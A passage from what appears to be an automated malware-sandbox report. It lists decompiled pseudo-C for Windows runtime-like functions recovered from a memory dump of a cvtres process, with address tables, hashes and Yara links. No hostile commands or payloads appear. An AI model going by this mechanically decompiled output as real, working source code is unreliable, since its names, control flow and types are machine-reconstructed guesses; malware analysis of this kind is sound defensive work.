				_t29 = E055E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E055BFFB0(0x5698550, _t27, 0x5698550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                        0x055e37fa
                                                                        0x055e37fc
                                                                        0x055e3805
                                                                        0x055e3808
                                                                        0x055e3808
                                                                        0x055e3814
                                                                        0x055e3818
                                                                        0x055e3846
                                                                        0x055e3848
                                                                        0x055e384b
                                                                        0x055e384b
                                                                        0x055e3852
                                                                        0x00000000
                                                                        0x055e3854
                                                                        0x055e3856
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e3863
                                                                        0x00000000
                                                                        0x055e3863
                                                                        0x055e381a
                                                                        0x055e381a
                                                                        0x055e381f
                                                                        0x055e386e
                                                                        0x055e386e
                                                                        0x055e3871
                                                                        0x055e3873
                                                                        0x055e3873
                                                                        0x055e3868
                                                                        0x00000000
                                                                        0x055e3868
                                                                        0x055e3821
                                                                        0x055e3826
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e3828
                                                                        0x055e382a
                                                                        0x055e3841
                                                                        0x00000000
                                                                        0x055e3841

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e30f4a61a621bba199cefa8f2c987a2c9e2f61a8f1be739053c148e90481501
                                                                        • Instruction ID: 78a66b371ccc0371463f2d7ac0bbd4befa9b76e8fde5ec27e8f34f03fd226ec8
                                                                        • Opcode Fuzzy Hash: 4e30f4a61a621bba199cefa8f2c987a2c9e2f61a8f1be739053c148e90481501
                                                                        • Instruction Fuzzy Hash: AA01C472A0A6119BC32B8A599944E36BFA7FFC6B5071748ADE845DB211DB30E801C7C0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AC962 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 42%
                                                                        			E055AC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x569d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E055BEEF0(0x56970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0562F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E055BEB70(_t29, 0x56970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E055EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0562F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x56970c0; // 0x0
					while(_t38 != 0x56970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x569b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                        0x055ac96a
                                                                        0x055ac974
                                                                        0x055ac988
                                                                        0x055ac98a
                                                                        0x05617c9d
                                                                        0x05617c9f
                                                                        0x05617ca4
                                                                        0x05617cae
                                                                        0x05617cf0
                                                                        0x05617cf5
                                                                        0x05617cfa
                                                                        0x055ac992
                                                                        0x055ac996
                                                                        0x055ac997
                                                                        0x055ac998
                                                                        0x055ac9a3
                                                                        0x055ac9a3
                                                                        0x05617cb0
                                                                        0x05617cb7
                                                                        0x05617cbb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617cbd
                                                                        0x05617ce8
                                                                        0x05617cc5
                                                                        0x05617cc8
                                                                        0x05617cca
                                                                        0x05617cd0
                                                                        0x05617cd6
                                                                        0x05617cde
                                                                        0x05617ce4
                                                                        0x05617ce4
                                                                        0x05617cd0
                                                                        0x00000000
                                                                        0x05617ce8
                                                                        0x055ac990
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73ed97c1750b896a9d45b22fb07618a5f31286adc81631f0fc7e9e94c4b5d1a8
                                                                        • Instruction ID: 14bbe03a2cda4eec64b6ac13c6e435c2a7ce5dca336f7283e7e502c2bae84299
                                                                        • Opcode Fuzzy Hash: 73ed97c1750b896a9d45b22fb07618a5f31286adc81631f0fc7e9e94c4b5d1a8
                                                                        • Instruction Fuzzy Hash: 6511E5313106069FCB14AF29DC4A97BBBFAFB85611B080528FC4683A50DF20EC10CBD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D002D Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055D002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E055C7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E055C7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E055C7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E055C7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                        0x055d0032
                                                                        0x055d0037
                                                                        0x055d0043
                                                                        0x05614b3a
                                                                        0x055d0049
                                                                        0x055d0049
                                                                        0x055d0049
                                                                        0x055d004e
                                                                        0x055d0053
                                                                        0x05614b48
                                                                        0x05614b5a
                                                                        0x05614b4a
                                                                        0x05614b53
                                                                        0x05614b53
                                                                        0x05614b5f
                                                                        0x00000000
                                                                        0x05614b61
                                                                        0x00000000
                                                                        0x05614b61
                                                                        0x055d0059
                                                                        0x055d0059
                                                                        0x055d0060
                                                                        0x05614b6f
                                                                        0x05614b6f
                                                                        0x055d0069
                                                                        0x05614b83
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614b90
                                                                        0x05614b9b
                                                                        0x05614b9b
                                                                        0x05614ba4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614baa
                                                                        0x00000000
                                                                        0x055d006f
                                                                        0x055d006f
                                                                        0x00000000
                                                                        0x055d006f
                                                                        0x055d0069

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                        • Instruction ID: 8828263bfa5e343cb501b953bd5072a51a1f5021b9e2c54ae1c38ded2763b04a
                                                                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                        • Instruction Fuzzy Hash: 4D11C2722056819FDB22C769C64CB357796FF44755F0D00E4DD068BBA2FB2AD841C668
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B766D Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E055B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E055DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E055DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L055C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                        0x055b7672
                                                                        0x055b767f
                                                                        0x055b7689
                                                                        0x055b76de
                                                                        0x055b76de
                                                                        0x055b768b
                                                                        0x055b7691
                                                                        0x055b7693
                                                                        0x055b7697
                                                                        0x00000000
                                                                        0x055b7699
                                                                        0x055b76a8
                                                                        0x00000000
                                                                        0x055b76aa
                                                                        0x055b76ad
                                                                        0x055b76b1
                                                                        0x00000000
                                                                        0x055b76b3
                                                                        0x055b76b3
                                                                        0x055b76b5
                                                                        0x055b76ba
                                                                        0x055b76bc
                                                                        0x055b76bc
                                                                        0x055b76c0
                                                                        0x00000000
                                                                        0x055b76c2
                                                                        0x055b76ce
                                                                        0x055b76ce
                                                                        0x055b76c0
                                                                        0x055b76b1
                                                                        0x055b76a8
                                                                        0x055b7697
                                                                        0x055b76d9

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                        • Instruction ID: 613908e7808654816b19f8194fdf9ca82731bc1f27362c45999aaded466f0579
                                                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                        • Instruction Fuzzy Hash: 9C018832710129AFD721DE5ECC5AE9B77ADFBC8660B150564B909CB254DAB0DD0187A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0563C450 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E0563C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E055E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E055E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E055E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E055E95D0();
				return L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                        0x0563c458
                                                                        0x0563c45d
                                                                        0x0563c466
                                                                        0x0563c468
                                                                        0x0563c469
                                                                        0x0563c46a
                                                                        0x0563c46b
                                                                        0x0563c46e
                                                                        0x0563c46f
                                                                        0x0563c471
                                                                        0x0563c476
                                                                        0x0563c476
                                                                        0x0563c47c
                                                                        0x0563c47e
                                                                        0x0563c480
                                                                        0x0563c480
                                                                        0x0563c483
                                                                        0x0563c484
                                                                        0x0563c486
                                                                        0x0563c488
                                                                        0x0563c48f
                                                                        0x0563c491
                                                                        0x0563c493
                                                                        0x0563c493
                                                                        0x0563c48f
                                                                        0x0563c498
                                                                        0x0563c49e
                                                                        0x0563c4ad
                                                                        0x0563c4ad
                                                                        0x0563c4b2
                                                                        0x0563c4b4
                                                                        0x0563c4cd

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                        • Instruction ID: 12767cbe26d78032878992f4ce5bc32cee1558e90ee531536492d55d0dac918f
                                                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                        • Instruction Fuzzy Hash: 7F01B5B624060ABFE725AF65CC85E63FB7DFF94390F004529F15452A60CB31ECA1CAA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A9080 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E055A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x56985ec;
				E055C2280(_t48, 0x56985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E055BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x569538c; // 0x77e06848
					if( *_t84 != 0x5695388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x567f6e8);
						E055FD0E8(0x56985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E056788F5(_t80, _t85, 0x5695388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x56986c0; // 0x50707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x56986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E055C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E056788F5(0x56985ec, _t85, 0x5695388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E055EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x569b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x56984c0;
																			if(_t82 >=  *0x56984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05679063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E055A922A(_t99);
										_t64 = E055C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05678B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x56986c0; // 0x50707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x56986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x56986bc;
													_t87 = 0x56986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E055A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x56986c4;
												_t87 = 0x56986c0;
												L27:
												E055D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E055FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x5695388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x569538c = _t51;
						goto L6;
					}
				}
			}




















                                                                        0x055a9082
                                                                        0x055a9083
                                                                        0x055a9084
                                                                        0x055a9085
                                                                        0x055a9087
                                                                        0x055a9096
                                                                        0x055a9098
                                                                        0x055a9098
                                                                        0x055a909e
                                                                        0x055a90a8
                                                                        0x055a90e7
                                                                        0x055a90e7
                                                                        0x055a90aa
                                                                        0x055a90b0
                                                                        0x055a90b7
                                                                        0x055a90bd
                                                                        0x055a90dd
                                                                        0x055a90e6
                                                                        0x055a90bf
                                                                        0x055a90bf
                                                                        0x055a90c7
                                                                        0x055a90cf
                                                                        0x055a90f1
                                                                        0x055a90f2
                                                                        0x055a90f4
                                                                        0x055a90f5
                                                                        0x055a90f6
                                                                        0x055a90f7
                                                                        0x055a90f8
                                                                        0x055a90f9
                                                                        0x055a90fa
                                                                        0x055a90fb
                                                                        0x055a90fc
                                                                        0x055a90fd
                                                                        0x055a90fe
                                                                        0x055a90ff
                                                                        0x055a9100
                                                                        0x055a9102
                                                                        0x055a9107
                                                                        0x055a910c
                                                                        0x055a9110
                                                                        0x055a9113
                                                                        0x055a9115
                                                                        0x055a9136
                                                                        0x055a913f
                                                                        0x055a9143
                                                                        0x056037e4
                                                                        0x056037e4
                                                                        0x055a9117
                                                                        0x055a9117
                                                                        0x055a911d
                                                                        0x00000000
                                                                        0x055a911f
                                                                        0x055a911f
                                                                        0x055a9125
                                                                        0x00000000
                                                                        0x055a9127
                                                                        0x055a912d
                                                                        0x055a9130
                                                                        0x055a9134
                                                                        0x055a9158
                                                                        0x055a915d
                                                                        0x055a9161
                                                                        0x055a9168
                                                                        0x05603715
                                                                        0x055a916e
                                                                        0x055a916e
                                                                        0x055a9175
                                                                        0x055a9177
                                                                        0x055a917e
                                                                        0x055a917f
                                                                        0x055a9182
                                                                        0x055a9182
                                                                        0x055a9187
                                                                        0x055a9187
                                                                        0x055a918a
                                                                        0x055a918d
                                                                        0x055a918f
                                                                        0x055a9192
                                                                        0x055a9195
                                                                        0x055a9198
                                                                        0x055a9198
                                                                        0x055a9198
                                                                        0x055a919a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560371f
                                                                        0x05603721
                                                                        0x05603727
                                                                        0x0560372f
                                                                        0x05603733
                                                                        0x05603735
                                                                        0x05603738
                                                                        0x0560373b
                                                                        0x0560373d
                                                                        0x05603740
                                                                        0x00000000
                                                                        0x05603746
                                                                        0x05603746
                                                                        0x05603749
                                                                        0x00000000
                                                                        0x0560374f
                                                                        0x0560374f
                                                                        0x05603751
                                                                        0x05603757
                                                                        0x05603759
                                                                        0x0560375c
                                                                        0x0560375c
                                                                        0x0560375e
                                                                        0x0560375e
                                                                        0x05603761
                                                                        0x05603764
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603766
                                                                        0x05603768
                                                                        0x056037a3
                                                                        0x056037a3
                                                                        0x056037a5
                                                                        0x056037a7
                                                                        0x056037ad
                                                                        0x056037b0
                                                                        0x056037b2
                                                                        0x056037bc
                                                                        0x056037c2
                                                                        0x056037c2
                                                                        0x056037b2
                                                                        0x055a9187
                                                                        0x055a9187
                                                                        0x055a918a
                                                                        0x055a918d
                                                                        0x055a918f
                                                                        0x055a9192
                                                                        0x055a9195
                                                                        0x00000000
                                                                        0x055a9195
                                                                        0x00000000
                                                                        0x0560376a
                                                                        0x0560376a
                                                                        0x0560376a
                                                                        0x0560376c
                                                                        0x0560376c
                                                                        0x0560376f
                                                                        0x05603775
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603777
                                                                        0x05603779
                                                                        0x05603782
                                                                        0x05603787
                                                                        0x05603789
                                                                        0x05603790
                                                                        0x05603790
                                                                        0x0560378b
                                                                        0x0560378b
                                                                        0x0560378b
                                                                        0x05603792
                                                                        0x05603795
                                                                        0x00000000
                                                                        0x05603795
                                                                        0x00000000
                                                                        0x05603779
                                                                        0x05603798
                                                                        0x00000000
                                                                        0x05603798
                                                                        0x00000000
                                                                        0x05603768
                                                                        0x0560379b
                                                                        0x0560379b
                                                                        0x05603751
                                                                        0x05603749
                                                                        0x00000000
                                                                        0x05603740
                                                                        0x055a91a0
                                                                        0x055a91a3
                                                                        0x055a91a9
                                                                        0x055a91b0
                                                                        0x00000000
                                                                        0x055a91b0
                                                                        0x055a9187
                                                                        0x055a91b4
                                                                        0x055a91b4
                                                                        0x055a91bb
                                                                        0x055a91c0
                                                                        0x055a91c5
                                                                        0x055a91c7
                                                                        0x056037da
                                                                        0x055a91cd
                                                                        0x055a91cd
                                                                        0x055a91cd
                                                                        0x055a91d2
                                                                        0x055a91d5
                                                                        0x055a9239
                                                                        0x055a9239
                                                                        0x055a91d7
                                                                        0x055a91db
                                                                        0x055a91e1
                                                                        0x055a91e7
                                                                        0x055a91fd
                                                                        0x055a9203
                                                                        0x055a921e
                                                                        0x055a9223
                                                                        0x00000000
                                                                        0x055a9205
                                                                        0x055a9205
                                                                        0x055a9208
                                                                        0x055a920c
                                                                        0x055a9214
                                                                        0x055a9214
                                                                        0x055a920c
                                                                        0x055a91e9
                                                                        0x055a91e9
                                                                        0x055a91ee
                                                                        0x055a91f3
                                                                        0x055a91f3
                                                                        0x055a91f3
                                                                        0x055a91e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055a9134
                                                                        0x055a9125
                                                                        0x055a911d
                                                                        0x055a914e
                                                                        0x055a90d1
                                                                        0x055a90d1
                                                                        0x055a90d3
                                                                        0x055a90d6
                                                                        0x055a90d8
                                                                        0x00000000
                                                                        0x055a90d8
                                                                        0x055a90cf

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09195c55a2f9d77faa360a4b9dd21756c4f6f4b6682b6a135ace6f4b80ff6549
                                                                        • Instruction ID: 81505d7ddf3e7f6275832992f124b17846a099521d06b940edf90733d75c1ff3
                                                                        • Opcode Fuzzy Hash: 09195c55a2f9d77faa360a4b9dd21756c4f6f4b6682b6a135ace6f4b80ff6549
                                                                        • Instruction Fuzzy Hash: 3701F4736012148FC3298F18E880B25BBBAFF81360F21406AF202CB691D770EC41CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05674015 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E05674015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E055C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E055C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x56986ac);
					E055AF900(0x56986d4, _t28);
					E055BFFB0(0x56986ac, _t28, 0x56986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E055BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                        0x0567401a
                                                                        0x0567401e
                                                                        0x05674023
                                                                        0x05674028
                                                                        0x05674029
